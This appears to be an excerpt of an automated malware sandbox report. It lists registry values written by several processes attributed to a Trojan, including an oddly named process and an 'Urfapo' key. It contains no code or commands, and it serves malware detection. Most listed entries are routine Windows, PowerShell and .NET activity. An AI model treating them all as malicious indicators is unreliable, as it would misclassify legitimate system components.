"System.Management.Automation.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "F2 14 57 C1 AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\System.Management.Automation.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "175"
"StoreChangeIDFor32BitProcesses" = "196"

The process PSCustomSetupUtil.exe:1284 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E5 6E 48 65 D3 1E CE 0A 46 9C 44 05 11 B7 0E 7D"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.ConsoleHost.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.ConsoleHost.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "AE 88 8B C1 AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "197"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "198"
"StoreChangeIDFor64BitProcesses" = "176"
"StoreChangeIDFor32BitProcesses" = "197"

The process PSCustomSetupUtil.exe:2332 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D9 CB 5C 3C 74 35 6A 54 61 9C 64 BB C5 F2 10 23"

[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"Path" = "C:\Perl\site\bin;C:\Perl\bin;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;c:\Program Files\Wireshark;%System%\WindowsPowerShell\v1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process PSCustomSetupUtil.exe:2556 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "37 AF 49 36 5B 22 39 C6 97 31 0F B9 8F 07 66 32"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GPowerShell.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "0C C1 C7 CB AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GPowerShell.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "210"
"StoreChangeIDFor64BitProcesses" = "188"
"StoreChangeIDFor32BitProcesses" = "209"

The process PSCustomSetupUtil.exe:2140 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B5 10 5C DF FC B8 21 75 7A 16 45 66 D8 1A 28 0C"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Diagnostics.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "88 81 26 C2 AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "201"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "202"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Diagnostics.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "180"
"StoreChangeIDFor32BitProcesses" = "201"

The process ipconfig.exe:1240 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "61 15 BF 2F B5 89 86 C3 D3 97 F1 32 28 D4 48 ED"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process yfenaromaf.exe:1664 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 B5 A4 65 FC 46 B9 A5 42 20 16 46 A4 B9 81 35"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process PSSetupNativeUtils.exe:1932 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "00 B5 CC 46 EE 3D 80 2F 7C DD A3 03 C6 08 FA 9E"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process mscorsvw.exe:4008 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "37 61 5F 71 73 90 CA ED 96 E6 BA BF D5 8B 56 3D"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:3128 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 0A 01 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "0"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 02 01 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 08 01 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F8 00 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "0"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D3 0F 67 71 89 16 30 A7 3B 8D 48 59 6B A9 72 32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 1C 01 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 EE 00 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

The process mscorsvw.exe:2592 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"DisplayName" = "Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\643db07b\27\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
"ConfigMask" = "4361"
"MVID" = "93 92 67 97 48 6D 4F 7A 9B 69 C5 87 5F F3 FC 30"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"ConfigString" = "ZAP--0000-0000"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"LastModTime" = "D0 21 40 C0 AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\43970528\4b\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"DisplayName" = "Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 30 BD F2 F8 D4 1E F0 A9 57 F4 3B B9 53 69 DD"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"SIG" = "EF D0 54 19 D0 F5 86 44 A9 62 4E 86 6A 5F 6C 6E"

